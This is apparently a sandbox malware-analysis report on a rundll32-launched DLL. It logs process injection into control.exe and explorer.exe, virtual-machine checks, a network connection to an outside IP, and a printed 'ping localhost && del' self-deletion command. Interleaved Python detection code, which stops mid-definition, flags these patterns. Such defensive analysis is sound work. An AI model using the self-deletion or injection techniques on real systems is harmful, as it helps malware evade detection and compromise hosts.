Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\{B8EF3798-B76F-AA89-016C-DB7EC5603F92}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{F0B43100-8FC3-A2DB-9924-33F6DD98178A}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{B8713496-B709-AA5B-016C-DB7EC5603F92}
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: xaj0e933Uv.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: Q5.pdb( source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.pdb( source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 5.pdb@ source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.411412197.0000000006230000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.403782872.0000000006180000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\in\the\town\where\ahung.pdb source: xaj0e933Uv.dll
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.pdb source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.411412197.0000000006230000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.403782872.0000000006180000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Q5.pdb source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 5.pdb( source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0343828B push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03437EA0 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034938A0 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03493D9F push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03473495 push ecx; mov dword ptr [esp], 00000002h
Source: xaj0e933Uv.dll | Static PE information: section name: .erloc
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034786AD LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
Source: xaj0e933Uv.dll | Static PE information: real checksum: 0x79835 should be: 0x765e4
Source: m5pod5s5.dll.21.dr | Static PE information: real checksum: 0x0 should be: 0xbf97
Source: a1gxko15.dll.24.dr | Static PE information: real checksum: 0x0 should be: 0x2015
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.dll

                      Hooking and other Techniques for Hiding and Protection

                      Source: Yara matchFile source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5132, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: control.exe PID: 4084, type: MEMORYSTR
                      Source: Yara match | File source: 2.3.rundll32.exe.50494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.5596b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.5596b40.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.55694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.rundll32.exe.3430000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.50494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.55694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.54ea4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.54ea4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll (2 occurrences)
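The two lines above are the self-deletion idiom the "Self deletion via cmd delete" and "Uses ping.exe to sleep" signatures fire on: explorer.exe (already injected) spawns cmd.exe, which pings localhost a few times purely to burn seconds, then deletes the sample DLL. The following is an added example, not part of the Joe Sandbox report, showing how to pull that pattern out of process-creation events: it splits the cmd.exe chain into stages, estimates the delay each stage buys (Windows ping sends one echo request per second, so `-n 5` against a responsive host takes about four seconds), collects the deleted paths, and checks whether one of them is the module an earlier rundll32.exe loaded. The events, column layout and the restored closing quote on the del argument are constructed for this example; `timeout` and `choice` are handled as well, generalizing beyond the ping form seen here.

```python
import re
from dataclasses import dataclass

# Constructed events modelled on this report's process tree:
# (parent image, child image, child command line). Not a real log export.
SAMPLE_EVENTS = [
    (r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\rundll32.exe",
     r'rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1'),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll"'),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\PING.EXE", "ping localhost -n 5"),
]

DEL_RE = re.compile(r"^(?:del|erase)\b(?P<rest>.*)$", re.IGNORECASE)


def split_chain(cmdline):
    """Strip a leading `cmd.exe /C` (or /K) and split the rest on &&, || and &."""
    body = re.sub(r'^\s*"?[^"]*?cmd(?:\.exe)?"?\s+/[ck]\s+', "", cmdline, flags=re.IGNORECASE)
    return [s.strip() for s in re.split(r"\s*(?:&&|\|\||&)\s*", body) if s.strip()]


def delay_seconds(stage):
    """Approximate wall-clock seconds a stage burns, or None if it is not a delay idiom."""
    tokens = stage.split()
    if not tokens:
        return None
    name = tokens[0].strip('"').lower().rsplit("\\", 1)[-1]
    if name in ("ping", "ping.exe"):
        # One echo request per second; the first reply is immediate, so N requests
        # to a host that answers take about N-1 seconds (ping's default N is 4).
        m = re.search(r"-n\s+(\d+)", stage, re.IGNORECASE)
        count = int(m.group(1)) if m else 4
        return max(count - 1, 0)
    if name in ("timeout", "timeout.exe", "choice", "choice.exe"):
        m = re.search(r"/t\s+(\d+)", stage, re.IGNORECASE)
        return int(m.group(1)) if m else None
    return None


def deleted_paths(stage):
    """Paths passed to del/erase, with the command's own switches (/f /q ...) dropped."""
    m = DEL_RE.match(stage.strip())
    if not m:
        return []
    out = []
    for quoted, bare in re.findall(r'"([^"]+)"|(\S+)', m.group("rest")):
        p = (quoted or bare).strip('"')
        if not p.startswith("/"):
            out.append(p)
    return out


def loaded_modules(events):
    """DLL paths handed to rundll32/regsvr32 earlier in the tree: the likely self-delete target."""
    mods = set()
    for _parent, image, cmdline in events:
        if image.lower().endswith(("rundll32.exe", "regsvr32.exe")):
            mods.update(p.lower() for p in re.findall(r'"([^"]+\.dll)"', cmdline, re.IGNORECASE))
    return mods


@dataclass
class Finding:
    parent: str
    delay_seconds: int
    deleted: list
    deletes_loaded_module: bool


def find_delayed_self_delete(events):
    """Flag cmd.exe chains that sleep via ping/timeout/choice and then delete a file."""
    mods = loaded_modules(events)
    findings = []
    for parent, image, cmdline in events:
        if not image.lower().endswith("cmd.exe"):
            continue
        delay, targets = 0, []
        for stage in split_chain(cmdline):
            d = delay_seconds(stage)
            if d is not None:
                delay += d
            targets.extend(deleted_paths(stage))
        if targets and delay > 0:
            findings.append(Finding(parent, delay, targets, any(t.lower() in mods for t in targets)))
    return findings


if __name__ == "__main__":
    for f in find_delayed_self_delete(SAMPLE_EVENTS):
        print(f)
```

The ping count is turned into seconds rather than matched as a literal because the same family varies the host (`localhost`, `127.0.0.1`) and the count between builds; the delay is what matters for correlating with the sandbox's analysis window.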
                      Source: C:\Windows\SysWOW64\rundll32.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX (7 occurrences)
                      Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (72 occurrences)
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX (26 occurrences)

                      Malware Analysis System Evasion

                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 (2 occurrences)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6852 | Thread sleep time: -11068046444225724s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6852 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5887
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3535
                      Source: C:\Windows\SysWOW64\rundll32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0348BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034799BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034765C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0347FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
                      Source: explorer.exe, 0000001D.00000000.464459722.0000000005454000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
                      Source: explorer.exe, 0000001D.00000000.433226771.00000000051AC000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001D.00000000.433299138.00000000051F7000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
                      Source: RuntimeBroker.exe, 00000025.00000000.589637413.000001F9B9A61000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001D.00000000.461594936.000000000510C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: e-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
                      Source: rundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352389329.0000000003305000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                      Source: explorer.exe, 0000001D.00000000.433299138.00000000051F7000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: explorer.exe, 0000001D.00000000.461594936.000000000510C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}on:Mondz?S
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00dRom0cY
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034786AD LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Windows\System32\loaddll32.exe | Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03478FEC StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.189.151.28 80
                      Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF62CE012E0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 4B0000
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF62CE012E0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 360000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FF802BC1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 2490000
                      Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 35E000
                      Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FF802BC1580
                      Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 4B0000
                      Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FF802BC1580
                      Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write (2 occurrences)
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\control.exe base: 4B0000 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe | Memory allocated: C:\Windows\explorer.exe base: 4B0000 protect: page execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3616 base: 360000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3616 base: 7FF802BC1580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3616 base: 2490000 value: 80
                      Source: C:\Windows\System32\control.exe | Memory written: PID: 3616 base: 35E000 value: 00
                      Source: C:\Windows\System32\control.exe | Memory written: PID: 3616 base: 7FF802BC1580 value: EB
                      Source: C:\Windows\System32\control.exe | Memory written: PID: 3616 base: 4B0000 value: 80
                      Source: C:\Windows\System32\control.exe | Memory written: PID: 3616 base: 7FF802BC1580 value: 40
                      Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 4084
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 3616
                      Source: C:\Windows\System32\control.exe | Thread register set: target process: 3616
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: C:\Windows\explorer.exe EIP: 2BC1580
                      Source: C:\Windows\System32\control.exe | Thread created: C:\Windows\explorer.exe EIP: 2BC1580
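Read together, the allocate/write/protect/thread lines above describe a two-hop injection chain: rundll32.exe allocates an RWX region in control.exe and hijacks a thread there; control.exe (and the PowerShell stage) then allocate in explorer.exe, write a payload, overwrite the first byte of an existing function at 7FF802BC1580 with EB (the opcode of a short JMP), start a thread at that address, and later write 40 back to the same spot. The following is an added example, not part of the Joe Sandbox report, that correlates such API-trace events per (source, target) pair and labels what each pair did: payload into a fresh RWX allocation, an inline patch of existing code used as the thread entry, the later restore of the patched byte, and SetThreadContext-style hijacks. The events are constructed from the addresses and PIDs in the report; the "high image range" cut-off is an assumption that the targets are 64-bit processes, whose images and system DLLs load near 0x7FF6..0x7FFF on x64.

```python
from dataclasses import dataclass, field

# Assumption: 64-bit targets. x64 EXE images under high-entropy ASLR and system DLLs
# load at 0x7FF6...-0x7FFF..., so a write at such an address hits code that already
# existed in the target rather than memory the injector allocated.
HIGH_IMAGE_RANGE = 0x7FF000000000

# Constructed API-trace events modelled on the report's lines:
# (source process, operation, target process, details). Not a real trace export.
SAMPLE_TRACE = [
    ("rundll32.exe:5132", "alloc", "control.exe:4084", {"base": 0x4B0000, "protect": "PAGE_EXECUTE_READWRITE"}),
    ("rundll32.exe:5132", "write", "control.exe:4084", {"base": 0x4B0000}),
    ("rundll32.exe:5132", "write", "control.exe:4084", {"base": 0x7FF62CE012E0}),
    ("rundll32.exe:5132", "set_thread_context", "control.exe:4084", {}),
    ("control.exe:4084", "alloc", "explorer.exe:3616", {"base": 0x4B0000, "protect": "PAGE_EXECUTE_READWRITE"}),
    ("control.exe:4084", "write", "explorer.exe:3616", {"base": 0x4B0000, "first_byte": 0x80}),
    ("control.exe:4084", "write", "explorer.exe:3616", {"base": 0x7FF802BC1580, "first_byte": 0xEB}),
    ("control.exe:4084", "protect", "explorer.exe:3616", {"base": 0x7FF802BC1580, "protect": "PAGE_EXECUTE_READWRITE"}),
    ("control.exe:4084", "set_thread_context", "explorer.exe:3616", {}),
    ("control.exe:4084", "create_thread", "explorer.exe:3616", {"start": 0x7FF802BC1580}),
    ("control.exe:4084", "protect", "explorer.exe:3616", {"base": 0x7FF802BC1580, "protect": "PAGE_EXECUTE_READ"}),
    ("control.exe:4084", "write", "explorer.exe:3616", {"base": 0x7FF802BC1580, "first_byte": 0x40}),
    ("powershell.exe:6644", "write", "explorer.exe:3616", {"base": 0x7FF802BC1580, "first_byte": 0xEB}),
    ("powershell.exe:6644", "write", "explorer.exe:3616", {"base": 0x2490000, "first_byte": 0x80}),
    ("powershell.exe:6644", "create_thread", "explorer.exe:3616", {"start": 0x7FF802BC1580}),
]


@dataclass
class Chain:
    source: str
    target: str
    rwx_allocs: list = field(default_factory=list)
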